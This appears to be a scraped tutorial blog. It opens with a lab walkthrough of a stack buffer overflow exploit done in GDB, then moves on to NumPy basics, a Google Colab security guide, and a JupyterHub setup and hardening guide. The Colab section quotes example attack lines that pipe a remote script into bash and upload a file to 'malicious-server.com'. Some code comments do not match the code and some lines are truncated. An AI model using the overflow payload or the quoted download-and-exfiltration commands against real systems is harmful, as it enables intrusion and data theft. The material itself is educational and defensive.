-O0 # Disable optimizations (keeps variables on the stack)
-ggdb # Include GDB debugging symbols
-static # Statically link libraries (fixed addresses, larger binary)
-U_FORTIFY_SOURCE # Disable _FORTIFY_SOURCE safety checks
-z execstack # Mark stack as executable (disable NX/DEP)
-fno-stack-protector # Disable stack canaries
-no-pie # Disable PIE (fixed code addresses, weaker ASLR)
-mpreferred-stack-boundary=2 # Set stack alignment to 4 bytes (2^2)
app.c -o app # Compile app.c into output binary “app”

gcc -m32 -O0 -ggdb -static -U_FORTIFY_SOURCE -z execstack -fno-stack-protector -no-pie -mpreferred-stack-boundary=2 app.c -o app

Access ASLR disabled shell using setarch

setarch # Run a program with modified architecture settings
`uname -m` # Use the current machine architecture (e.g., x86_64)
-R # Disable ASLR (Address Space Layout Randomization)
$SHELL # Start a new shell with these settings applied

setarch `uname -m` -R $SHELL

Change the app mode

chmod # a Linux/Unix command used to change the permissions of a file or directory
+x # Make it executable
app # Name of the app

chmod +x app

Then, run the program with gdb

root@u20:~# gdb app
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.2) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from app...

Instead of manually entering input, we use a Python script to generate the payload. The payload is 34 bytes in length, where 20 bytes are required to cause a segmentation fault and the remaining bytes serve as padding.

(gdb) run < <(python3 -c "import struct; import sys; sys.stdout.buffer.write(b'A'*34)")
Starting program: /root/app < <(python3 -c "import struct; import sys; sys.stdout.buffer.write(b'A'*34)")
Enter text: You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()

Print the CPU registers, focusing on the EIP register, which is updated by the CPU to point to the next instruction to execute. When a function returns, the return address is stored on the stack and then loaded into EIP. In this case, the value 0x08004141 indicates that user‑controlled input has partially overwritten the return address. This confirms that the return address is reached after 32 bytes of padding.

(gdb) info registers
eax            0x30                48
ecx            0x7fffffd0          2147483600
edx            0x80b503c           134959164
ebx            0x41414141          1094795585
esp            0xffffd660          0xffffd660
ebp            0x41414141          0x41414141
esi            0x80e7000           135163904
edi            0x80e7000           135163904
eip            0x8004141           0x8004141
eflags         0x10286             [ PF SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

Let’s find the hidden function address

(gdb) disas hidden
Dump of assembler code for function hidden:
   0x08049d95 <+0>:     endbr32 
   0x08049d99 <+4>:     push   %ebp
   0x08049d9a <+5>:     mov    %esp,%ebp
   0x08049d9c <+7>:     push   %ebx
   0x08049d9d <+8>:     sub    $0x4,%esp
   0x08049da0 <+11>:    call   0x8049c70 <__x86.get_pc_thunk.bx>
   0x08049da5 <+16>:    add    $0x9d25b,%ebx
   0x08049dab <+22>:    sub    $0xc,%esp
   0x08049dae <+25>:    lea    -0x31ff8(%ebx),%eax
   0x08049db4 <+31>:    push   %eax
   0x08049db5 <+32>:    call   0x8058b40 <puts>
   0x08049dba <+37>:    add    $0x10,%esp
   0x08049dbd <+40>:    sub    $0xc,%esp
   0x08049dc0 <+43>:    lea    -0x31fe8(%ebx),%eax
   0x08049dc6 <+49>:    push   %eax
   0x08049dc7 <+50>:    call   0x8051560 <system>
   0x08049dcc <+55>:    add    $0x10,%esp
   0x08049dcf <+58>:    sub    $0xc,%esp
   0x08049dd2 <+61>:    push   $0x0
   0x08049dd4 <+63>:    call   0x8050730 <exit>
End of assembler dump.

Use that address in the exploit payload after the 32 bytes padding, this will call the hidden function that lists directory files

(gdb) run < <(python3 -c "import struct; import sys; sys.stdout.buffer.write(b'A'*32 + struct.pack('I', 0x08049d95))")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/app < <(python3 -c "import struct; import sys; sys.stdout.buffer.write(b'A'*32 + struct.pack('I', 0x08049d95))")
Enter text: You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Hidden Function
[Detaching after vfork from child process 449]
total 784
drwx------  5 root root   4096 Feb 10 20:16 .
drwxr-xr-x 24 root root   4096 Feb 10 18:59 ..
-rw-r--r--  1 root root   1024 Feb 10 07:02 .app.swp
-rwxr-xr-x  1 root root 721556 Feb 10 20:16 app
-rw-r--r--  1 root root    326 Feb 10 20:16 app.c
drwxr-xr-x  9 root root   4096 Oct 19 14:51 vsftpd-2.3.4
[Inferior 1 (process 446) exited normally]

April 5, 2026

NumPy
NumPy

NumPy stands for Numerical Python, it’s a Python module that was created in 2005 for working with arrays,

Install (If pip does not work, try pip3)

pip # Python’s package manager used to install libraries
install # Tells pip to download and install a package
numpy # A Python library for numerical and scientific computing
```
(Host) $ pip install numpy
```
import numpy as np # Imports the NumPy library and gives it the alias np
```
import numpy as np
```
Create an Array

A data structure that stores more than one item of the same type; it’s similar to lists in Python but more efficient, convenient, requires less memory and fast. To create an array, use the .array() with the items surrounded by [], you can also pass the dtype parameter to the .array() method for describing the data type

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3]) # Creates a NumPy array from the Python list
print(arr) # Prints the array
```
import numpy as np
arr = np.array([1,2,3])
print(arr)
```
Result
```
[1 2 3]
```
Data Types

If you want to describe the data type, pass dtype the with the first letter of the data type, you can also get the type size using np.dtype('b').itemsize
```
i integer
b boolean
u unsigned integer
f float
c complex float
m timedelta
M datetime
O object
S string
U unicode string
V void
```
Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3], dtype=’f’) # Creates a NumPy array from the Python list and set the data type of the elements to float32, so the numbers are stored as floating-point numbers
print(arr) # Prints the array
```
import numpy as np
arr = np.array([1,2,3], dtype='f')
print(arr)
```
Result
```
[1. 2. 3.]
```
Create Multi-Dimensional

To create a multi-dimensional array, use the .array() with the items surrounded by [] within [], you can also pass the dtype parameter to the .array() method for describing the data type

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[‘item 1′,’item 2’],[‘item 1′,’item 2’]]) # Creates a 2-dimensional NumPy array (a 2×2 “matrix”) from a nested list
print(arr) # Prints the array
```
import numpy as np
arr = np.array([['item 1','item 2'],['item 1','item 2']]) 
print(arr)
```
Result
```
[['item 1' 'item 2']
 ['item 1' 'item 2']]
```
Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2],[1,2]], dtype=’f’) # Creates a 2-dimensional NumPy array (a 2×2 “matrix”) from a nested list and set the data type of the elements to float32, so the numbers are stored as floating-point numbers
print(arr) # Prints the array
```
import numpy as np
arr = np.array([[1,2],[1,2]], dtype='f') 
print(arr)
```
Result
```
[[1. 2.]
 [1. 2.]]
```
Create Empty Arrays

To create an empty array, you can either use the .empty() or .zeros() methods. The .empty() method will return an array without initializing entries, whereas the .zeros() method will return an array filled with zeros,.

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.zeros(shape=(10),dtype=’i’) # Creates a 10×1 array, all items initialized to 0s, stored as integer numbers
print(arr) # Prints the array
```
import numpy as np
arr = np.zeros(shape=(10),dtype='i')
print(arr)
```
Result
```
[0 0 0 0 0 0 0 0 0 0]
```
Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.empty(shape=(10)) # Creates a 10×1 array, do not initialize the items, stored as integer numbers
print(arr) # Prints the array
```
import numpy as np
arr = np.empty(shape=(10),dtype='i')
print(arr)
```
Result
```
[ 0 1072693248  0 1074135040  0 1075314688
  0 1076199424  0 1076953088]
```
Create an Array Filled With Ones

To create an array that has 1s in it, you can either use the .ones() method

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.ones(shape=(10),dtype=’i’) # Creates a 10×1 array, do not initialize the items, stored as integer numbers
print(arr) # Prints the array
```
import numpy as np
arr = np.ones(shape=(10),dtype='i')
print(arr)
```
Result
```
[1 1 1 1 1 1 1 1 1 1]
```
Accessing Elements

To access an element of an array, use the index. E.g., to access the first item in a 1d array, you can do [0]. To access 2nd element of the second array in a 2d array, you can do [1][1], and so on

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2], dtype=’f’) # Creates an array with values 1 and 2, set the data type of the elements to float32.
print(arr[0]) # Prints the first element of the array (indexing starts at 0).
```
import numpy as np 
arr = np.array([1,2], dtype='f') 
print(arr[0])
```
Result
```
1.0
```
Slicing Arrays

To slice an array, use the smart indexing [], you can do something like this [start:end] or [start:end:step]

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3,4,5]) # Creates an array with values 1,2,3,4,5
print(arr[1:4]) # The syntax is arr[start:stop], which selects elements starting from index start up to but not including index stop, prints the selected items
```
import numpy as np
arr = np.array([1,2,3,4,5])
print(arr[1:4])
```
Result
```
[2 3 4]
```
Get Array Size

To get number of items of an array, use the .size() method

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2],[1,2]], dtype=’f’) # Creates a 2-dimensional NumPy array (a 2×2 “matrix”) from a nested list, and set the data type of the elements to float32
print(arr.size) # Prints the array size (The total of items in the array)

Example
```
import numpy as np 
arr = np.array([[1,2],[1,2]], dtype='f') 
print(arr.size)
```
Result
```
4
```
Get Array Shape

To get the shape of an array, use the .shape() method

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2],[1,2]], dtype=’f’) # Creates a 2-dimensional NumPy array (a 2×2 “matrix”) from a nested list, and set the data type of the elements to float32
print(arr.shape) # Prints the array size (The total of items in the array)

Example
```
import numpy as np 
arr = np.array([[1,2],[1,2]], dtype='f') 
print(arr.shape)
```
Result
```
(2, 2)
```
Reshape Arrays

You can reshape an array using the .reshape() method

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3,4,5,6]) # Creates an array with values 1,2,3,4,5,6
arr = arr.reshape(2,3) # Reshapes the array to 2×3 (2 rows and 3 columns)
print(arr) # Prints the array
```
import numpy as np
arr = np.array([1,2,3,4,5,6])
arr = arr.reshape(2,3)
print(arr)
```
Result
```
[[1 2 3]
 [4 5 6]]
```
Flatten Arrays

You can flatten (Convert from multi-dimensional to one-dimensional) an array using the .reshape() method with -1

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2,3],[4,5,6]]) # Creates a 2d array
arr = arr.reshape(2,3) # Reshapes the array to a 1d array
print(arr) # Prints the array
```
import numpy as np
arr = np.array([[1,2,3],[4,5,6]])
arr = arr.reshape(-1)
print(arr)
```
Result
```
[1 2 3 4 5 6]
```
Finding Elements

To find an element, use the np.argwhere() method

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2,3],[4,5,6]]) # Creates a 2d array
print(np.argwhere(arr == 33)) # Prints the row and column location(s) where the value 33 appears in the array
```
import numpy as np
arr = np.array([[1,2,3],[11,22,33]])
print(np.argwhere(arr == 33))
```
Result
```
[[1 2]]
```
Removing Elements

To remove an element, use the np.delete() method

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3,4,5,6]) # Creates an array with values 1,2,3,4,5,6,7,8
index = np.argwhere(arr == 4) # Finds the row and column location(s) where the value 4 appears in the array
arr = np.delete(arr, index) # Removes the element(s) at the given index from arr, then stores the result back in arr
print(arr) # Prints the array
```
import numpy as np
arr = np.array([1,2,3,4,5,6,7,8])
index = np.argwhere(arr == 4)
arr = np.delete(arr, index)
print(arr)
```
Result
```
[1 2 3 5 6 7 8]
```
```
# Add arr = arr[arr != 4]
```
```
#np.place(arr,(arr == 4),5)
```
Creating Images

The following represents a single pixel with RGB values of (0, 0, 0), which is black.

Example

import numpy as np # Imports the NumPy library and gives it the alias np
import matplotlib.pyplot as plt # Import Matplotlib for plotting and image display
pixel_rgb = np.array([[[0, 0, 0]]], dtype=np.uint8) # Create a 1×1 image with an RGB pixel value of (0, 0, 0) – This represents a single black pixel, dtype=np.uint8 ensures values are in the valid range for image data (0–255)
plt.imshow(pixel_rgb) # Display the RGB pixel as an image
plt.title(“Example”) # Add a title above the image
plt.axis(‘off’) # Remove x and y axis ticks for a cleaner image display
plt.show() # Render the image on the screen
```
import numpy as np
import matplotlib.pyplot as plt
pixel_rgb = np.array([[[0, 0, 0]]], dtype=np.uint8)
plt.imshow(pixel_rgb)
plt.title("Example")
plt.axis('off')
plt.show()
```
Example

import numpy as np # Import NumPy for array creation and manipulation
from PIL import Image # Import Image module (not used directly here)
import matplotlib.pyplot as plt # Import matplotlib for image display (not used here)
img = np.zeros([1,1,3], dtype=np.uint8) # Create a 1×1 RGB image array initialized to zeros
img.fill(0) # Fill the array with 0 (black pixel)
print(img) # Print the pixel values of the image array
```
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
img = np.zeros([1,1,3],dtype=np.uint8)
img.fill(0)
print(img)
```
You can also list all pixels

umpy as np # Import NumPy for array creation and manipulation
from PIL import Image # Import Image module (not used directly here)
import matplotlib.pyplot as plt # Import matplotlib for image display (not used here)
img = np.zeros([1,1,3], dtype=np.uint8) # Create a 1×1 RGB image array initialized to zeros
img.fill(0) # Fill the array with 0 (black pixel)
height, width, _ = img.shape # Loop over each row (y-coordinate)
for y in range(height): # Loop over each row (y-coordinate)
for x in range(width): # Loop over each column (x-coordinate)
print(img[y, x]) # Print the pixel value at position (y, x), this is typically an array like [R, G, B]
plt.imshow(img) # Display the image using matplotlib
plt.title(“Example”) # Add a title to the image
plt.axis(‘off’) # Turn off axis ticks and labels
plt.show() # Render the image on the screen
```
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
img = np.zeros([1,1,3],dtype=np.uint8)
img.fill(0)
height, width, _ = img.shape
for y in range(height): 
    for x in range(width):
        print(img[y, x])
plt.imshow(img)
plt.title("Example")
plt.axis('off')
plt.show()
```
Converting Images Into Arrays

The following opens an image file using Pillow, converts the image into a NumPy array so its pixel values can be processed numerically, and then prints the resulting array.

from PIL import Image # Import Image class from Pillow to work with image files
import numpy as np # Import NumPy for numerical array operations
img = Image.open(‘example.png’) # Open the image file and load it as a PIL Image object
img_array = np.array(img) # Convert the image into a NumPy array (pixel values)
print(img_array) # Print the array representing the image pixels
```
from PIL import Image
import numpy as np
img = Image.open('example.png')
img_array = np.array(img)
print(img_array)
```
Create Random Image

Creates and shows a tiny, randomly colored image

umpy as np # Import NumPy for array creation and manipulation
from PIL import Image # Import Image module (not used directly here)
import matplotlib.pyplot as plt # Import matplotlib for image display (not used here)
pixel_rgb = np.random.randint(0,256, size=(10,10,3)) # Generate a 10×10 image with random RGB values, np.random.randint(0,256, size=(10,10,3)) creates integers from 0 to 255 for each RGB channel
plt.imshow(pixel_rgb) # Show the image from the pixel array
plt.title(“Example”) # Add a title to the image
plt.axis(‘off’) # Hide the axes for a cleaner display
plt.show() # Render the image on screen
```
import numpy as np
import matplotlib.pyplot as plt
pixel_rgb = np.random.randint(0,256, size=(10,10,3))
plt.imshow(pixel_rgb)
plt.title("Example")
plt.axis('off')
plt.show()
```
Cybersecurity – Example 1 (Network Traffic Analysis)

You use the np.mean() function to detect unusual spikes, which might indicate a DDoS attack

import numpy as np # Import the NumPy library and give it the alias ‘np’
packets_per_second = np.array([1000, 50, 100, 120, 500, 115000]) # Calculate the average (mean) number of packets per second
print(“Average packets per second:”, np.mean(packets_per_second)) # Print the calculated average with a descriptive message
```
import numpy as np
packets_per_second = np.array([1000, 50, 100, 120, 500, 115000])
print("Average packets per second:", np.mean(packets_per_second))
```
Cybersecurity – Example 2 (Login Attempts Monitoring)

You use the np.mean() function to track failed login attempts to detect brute force attacks

import numpy as np # Import the NumPy library and give it the alias ‘np’
failed_logins = np.array([10, 2, 0, 1, 1, 0,4]) # Calculate the average (mean) number of failed login
print(“Average failed logins per hour:”, np.mean(failed_logins)) # Print the calculated average with a descriptive message
```
import numpy as np
failed_logins = np.array([10, 2, 0, 1, 1, 0,4])
print("Average failed logins per hour:", np.mean(failed_logins))
```
Cybersecurity – Example 3 (CPU/Memory Usage Monitoring)

You use the np.mean() function to track failed login attempts to detect unusual resource usage

import numpy as np # Import the NumPy library and give it the alias ‘np’
high_usage = np.array([2, 8, 10, 95, 10]) # Calculate the average (mean) number of failed login
print(“Average CPU usage:”, np.mean(high_usage)) # Print the calculated average with a descriptive message
```
import numpy as np
high_usage = np.array([2, 8, 10, 95, 10])
print("Average CPU usage:", np.mean(high_usage))
```
April 4, 2026
Google Colab
Google Colab

Google Colab (Colaboratory) is a cloud-based, hosted Jupyter Notebook environment provided by Google. It allows users to write and run Python code in a web browser without installing any software locally. Colab is particularly popular for data science, machine learning, and deep learning projects due to its easy access to computing resources, including CPUs, GPUs, and TPUs.

Colab is available in two main tiers:
- Free version: Designed primarily for learning, experimentation, and lightweight projects. Users get access to a basic virtual machine with limited RAM and CPU/GPU resources. Sessions in the free tier have time limits, and resources are allocated dynamically, so performance may vary.
- Paid versions: Targeted at professional or heavy users who need more consistent performance. Paid subscriptions provide faster GPUs, larger RAM allocations, longer runtimes, and priority access to resources, making them suitable for more demanding tasks such as training large machine learning models.
Key features of Google Colab include:
- Interactive coding: Run code cells, visualize outputs, and modify computations in real-time.
- Seamless integration with Google Drive: Save notebooks directly in Drive for easy access and sharing.
- Pre-installed libraries: Popular Python libraries for data analysis, machine learning, and visualization (e.g., NumPy, pandas, Matplotlib, TensorFlow, PyTorch) are already installed.
- Collaboration: Multiple users can work on the same notebook simultaneously, similar to Google Docs.
- Hardware acceleration: Easily switch between CPU, GPU, and TPU for faster computations without complex setup.
Overall, Google Colab provides a flexible, accessible, and collaborative environment for learning, experimentation, and professional projects, making advanced computational resources available to anyone with an internet connection.

You can access the free tier of Google Colab by signing in with your Google account at the following link https://colab.research.google.com/drive/

Colab Security

The security of Google Colab is tied to your Google Account. For example, if you enable two-factor authentication and carefully manage sharing permissions, your notebooks and data remain protected. However, if your account is compromised or you share notebooks with broad access, others may be able to view or modify your work.

Google Colab Cyberattacks
- Phishing Attack
  - A threat actor sends a phishing email impersonating Google, prompting the recipient to log in to Colab via a fake link.
  - Impact:
    
    If the person falls for it, the threat actor can access their Google Account
    
    The Colab notebooks, Drive files, and connected data are exposed
  - Preventive Measures :
    
    Verify URLs before logging in
    
    Enable two-factor authentication (2FA)
    
    Never enter credentials on suspicious sites
- Credential Stuffing
  - A threat actor uses leaked passwords from other services to attempt to log into someone’s Google Account.
  - Impact:
    
    If the password is reused, the threat actor gains access to Colab notebooks
    
    They can view sensitive datasets, copy or delete notebooks, or run malicious code
  - Preventive Measures:
    
    Use strong, unique passwords for Google Accounts
    
    Enable 2FA
    
    Regularly monitor login activity
- Unauthorized Access via Over-Sharing
  - Someone shares a notebook as “Anyone with the link – Editor”, and a threat actor discovers the link.
  - Impact:
    
    The threat actor can modify the notebook, insert malicious code, or exfiltrate data
    
    Other users who run the notebook may unknowingly execute harmful commands
  - Preventive Measures :
    
    Limit sharing to specific people
    
    Use Viewer or Commenter access when editing isn’t needed
- Malicious Code Injection
  - A threat actor provides a notebook containing malicious commands, which someone runs in Colab: !wget https://example.com/script.sh && !bash script.sh or curl -sL https://example.com/script.sh | bash
  - Impact:
    
    The code could install malware or spyware
    
    It might steal data from the mounted Google Drive
    
    It could send sensitive data to external servers
  - Preventive Measures :
    
    Review all code before executing
    
    Avoid running untrusted notebooks, especially shell commands (!)
    
    Mount the drive only when necessary
- 5: Data Exfiltration
  - A threat actor sneaks code into a shared notebook that uploads files from someone’s session to a remote server: requests.post("https://malicious-server.com/upload", files={"file": open("data.csv","rb")})
  - Impact:
    
    Sensitive data, credentials, or IP information may be stolen
    
    The person may not realize the data has been compromised until it’s too late
  - Preventive Measures :
    
    Avoid running unknown scripts
    
    Inspect network calls in notebooks
    
    Clear outputs and restart the runtime before sharing
- Ransomware-Style Attack
  - A threat actor sends a notebook that encrypts files in someone’s mounted Google Drive when executed.
  - Impact:
    
    Access to the files is blocked until a ransom is paid
    Data loss or corruption may occur
  - Preventive Measures :
    
    Keep backups of important files
    
    Avoid running notebooks from untrusted sources
    
    Limit Colab access and Drive mounting to trusted notebooks only
Create a Notebook

After logging in, go to New Notebook or go to File, then New Notebook.

Or

Rename the Notebook

You can rename the notebook by left-clicking its name.

Execute Python Code

In the top-left corner, the + Code button adds code snippets to the interactive document. The code snippets have a right arrow symbol. Type print("Hello world") and click on that arrow

Result

Wrapping Output Text

If you want the text to be wrapped, execute the following in the first cell as code

from IPython.display import HTML, display # Imports HTML display tools, HTML() lets you write HTML/CSS and display() renders it in the notebook
def css(): # Create a function
display(HTML(”'<style>pre {white-space: pre-wrap;}</style>”’)) # Injects CSS to make all <pre> blocks (code cells) wrap long lines instead of scrolling horizontally.
get_ipython().events.register(‘pre_run_cell’, css) # The CSS is applied automatically before every cell runs.
```
from IPython.display import HTML, display

def css():
  display(HTML('''<style>pre {white-space: pre-wrap;}</style>'''))

get_ipython().events.register('pre_run_cell', css)
```
Result

Colab Virtual Instance IP

Colab virtual instances (Containers) are connected to internet

from requests import get # Imports the get function from the requests library to make HTTP requests
ip = get(‘https://api.ipify.org’).content.decode(‘utf8’) # Sends a request to api.ipify.org, a service that returns your public IP as plain text, the return will converted it into a string
print(“Public IP is: “, ip) # Prints your public IP in a readable format
```
from requests import get
ip = get('https://api.ipify.org').content.decode('utf8')
print("Public IP is: ", ip)
```
Result

Colab Processes

You can get current processes using psutil module

import psutil # Imports the psutil library, which is used for system monitoring (CPU, memory, processes)
for id in psutil.pids(): # Returns a list of all process IDs (PIDs) currently running and loops through them
print(psutil.Process(id).name()) # prints each process name
```
import psutil
for id in psutil.pids():
    print(psutil.Process(id).name())
```
Result

Colab Extensions

Colab Extensions are extra tools or add-ons that enhance Google Colab’s functionality beyond its default features. They help you work faster, explore data better, and customize your notebook experience. google.colab.data_table is a module in Google Colab that lets you display pandas DataFrames as interactive tables inside a notebook (Some Colab Extensions already loaded in the notebook).

%load_ext google.colab.data_table # Load Colab extension to display DataFrames as interactive tables

import pandas as pd # Import pandas library for data manipulation
import numpy as np # Import numpy library for numerical operations

data = { # Create a dictionary with sample data
‘Name’: [‘John’, ‘Jane’, ‘Joe’], # List of names
‘Sales’: [25, 30, 35], # List of corresponding sales numbers
‘City’: [‘New York’, ‘Los Angeles’, ‘Houston’] # List of corresponding cities
}

df = pd.DataFrame(data) # Convert dictionary to pandas DataFrame
df.to_csv(‘dummy_data.csv’, index=False) # Save DataFrame to CSV file without index column
df # Display the DataFrame in the notebook
```
%load_ext google.colab.data_table

import pandas as pd
import numpy as np

data = {
    'Name': ['John', 'Jane', 'Joe'],
    'Sales': [25, 30, 35],
    'City': ['New York', 'Los Angeles', 'Houston']
}

df = pd.DataFrame(data)
df.to_csv('dummy_data.csv', index=False)
df
```
Result

Colab Environment Variables

To securely access saved secrets (like API keys) in Google Colab without putting them directly in your code, use google.colab.userdata. It helps protect sensitive information when sharing notebooks.

Then, you will see the secret
March 30, 2026
JupyterHub
JupyterHub

JupyterHub is an open-source platform that provides multi-user access to Jupyter Notebook or JupyterLab environments. While JupyterLab or the single-user Jupyter Notebook server is suitable for individual users, JupyterHub is ideal for educational institutions, research groups, or organizations that need multiple users to have their own interactive computing environments on a shared server. Each user gets a personal, isolated instance of a Jupyter Notebook or JupyterLab server, while administrators can centrally manage authentication, resource allocation, and access control.

JupyterHub supports a variety of authentication methods, including OAuth, LDAP, GitHub, and custom systems, making it flexible for different organizational needs. It can be deployed on a single server or scaled across cloud infrastructure or high-performance computing clusters, allowing dozens or even hundreds of users to run notebooks simultaneously.

Security is a critical concern for JupyterHub deployments. Because it exposes interactive coding environments over a network, improper configuration can allow threat actors to exploit vulnerabilities, gain unauthorized access, or use the server for malicious activities, such as launching attacks or mining cryptocurrencies. To mitigate risks, administrators should enforce strong authentication, HTTPS encryption, firewall rules, and regular updates.

Key features of JupyterHub include:
- Multi-user management: Centralized control over multiple notebook instances.
- Customizable environments: Each user can have their own libraries and resources without affecting others.
- Scalability: Can run on local servers, cloud platforms, or containerized systems like Docker or Kubernetes.
- Integration with JupyterLab: Users can work in the modern JupyterLab interface while administrators manage the backend infrastructure.
Overall, JupyterHub provides a secure, scalable, and collaborative platform for teams or classrooms that need interactive computing environments, but it requires careful setup to maintain security and reliability.

Installing JupyterHub on Ubuntu Server

We will be installing JupyterHub in the Ubuntu Server VM. The installation process takes ~5-10 minutes to finish.
1. Setup Ubuntu Server in a VM
2. Go to the terminal and run
  1. sudo apt install python3 python3-dev git curl
  2. curl -L https://tljh.jupyter.org/bootstrap.py | sudo -E python3 - --admin admin
3. Verify that JupyterHub is working by running sudo lsof -i :80 in the terminal
4. Go to your web and type 127.0.0.0
5. Enter admin as username and type any strong password you would like to use
Hardening JupyterHub (Latest Software Version)

We installed JupyterHub from the company website using a bootstrap script. In this case, the script will pull the latest version of JupyterHub and install it for us. When installing software, always make sure it comes from a trusted source. If you install software manually, make sure to check its integrity using checksums.

Type server_ip/hub/admin# in the web browser

The software version does match the pip website

To update to the latest version, you can run this command in the terminal (Do not run this in JupyterHub)

curl # Command-line tool used to download data from a URL
-L # Tells curl to follow redirects (the URL may redirect to another location
https://tljh.jupyter.org/bootstrap.py # The URL of the bootstrap installer script for
| # pipe, sends the downloaded script directly to another command instead of saving it to a file.
sudo # Runs the next command with administrator (root) privileges, required to install system services and packages.
python3 # Uses the system’s Python 3 interpreter to execute the script
– # Tells Python to read the script from standard input (stdin) (i.e., from the pipe
–version=latest # Argument passed to bootstrap.py, instructing it to install the latest TLJH release
```
(VM) $ curl -L https://tljh.jupyter.org/bootstrap.py | sudo python3 - --version=latest
```
Hardening JupyterHub Server (Change default credentials or adding regular users)

Type server_ip/hub/admin# in the web browser. If you used default usernames and passwords, you can change them from here (Remember, do not use default usernames and passwords in production environments – You can have default credentials in testing environments, but not production environments).

Also, you can manage the users using tljh-config

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
add-item # A subcommand that adds a value to a list-type configuration setting.
users.admin # The configuration key that stores the list of JupyterHub admin users.
<username> # The Linux/JupyterHub username you want to grant admin privileges to (Replace this with the actual username.
```
(VM) $ sudo tljh-config add-item users.admin <username>
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
Or, you can delete a use

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
add-item # A subcommand that adds a value to a list-type configuration setting.
users.admin # The configuration key that stores the list of JupyterHub admin users.
<username> # The Linux/JupyterHub username you want to delete (Replace this with the actual username.
```
(VM) $ sudo tljh-config remove-item users.admin <username>
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
Hardening JupyterHub (Disabling Features)

To disable accessing the terminal (This does not disable magic commands – threat actors can still utilize magic commands)

Generate jupyter_notebook_config.py and move it to /opt/tljh/user/etc/jupyter

/opt/tljh/user/bin/jupyter # The Jupyter executable from TLJH’s user Python environment (not the system Python).
notebook # Runs the classic Jupyter Notebook application (not JupyterLab).
–generate-config # Tells Jupyter to create a default configuration file and then exit.
```
(VM) $ /opt/tljh/user/bin/jupyter notebook --generate-config
Writing default config to: /home/<change this to the current username>/.jupyter/jupyter_notebook_config.py
```
sudo # Runs the command with administrator (root) privileges because you are moving a file into a system-managed directory.
mv # The Linux command to move or rename files.
/home/<username>/.jupyter/jupyter_notebook_config.py # The source file: a Jupyter Notebook configuration file generated earlier.
/opt/tljh/<username>/etc/jupyter/ # The destination directory for TLJH-managed Jupyter configuration.
```
(VM) $ sudo mv /home/test/.jupyter/jupyter_notebook_config.py /opt/tljh/user/etc/jupyter/
```
After that, change the #c.ServerApp.terminals_enabled = False to c.ServerApp.terminals_enabled = False in the copied file /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py

sudo # Runs the command with administrator (root) privileges because you are moving a file into a system-managed directory.
nano # A simple command-line text editor in Linux.
/opt/tljh/user/etc/jupyter/jupyter_notebook_config.py # The system-wide Jupyter Notebook configuration file for TLJH
```
(VM) $ sudo nano /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py
```
Reload JupyterHub

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
Now, the terminal is removed

Hardening JupyterHub (Enabling HTTPS)

We will be using a self-signed cert for HTTPS using the openssl command

mkdir # Linux command to create a new directory – folder).
/etc/https # The path for the new directory you want to create.
```
(VM) $ mkdir /etc/https
```
cd # Linux command to change the current directory in the terminal.
/etc/https # The path to the directory you want to switch to.
```
(VM) $ cd /etc/https
```
sudo # Runs the command with administrator privileges, necessary because you’re creating files in a system directory (/etc/https)
openssl # The OpenSSL tool, used to generate SSL/TLS certificates, keys, and handle encryption.
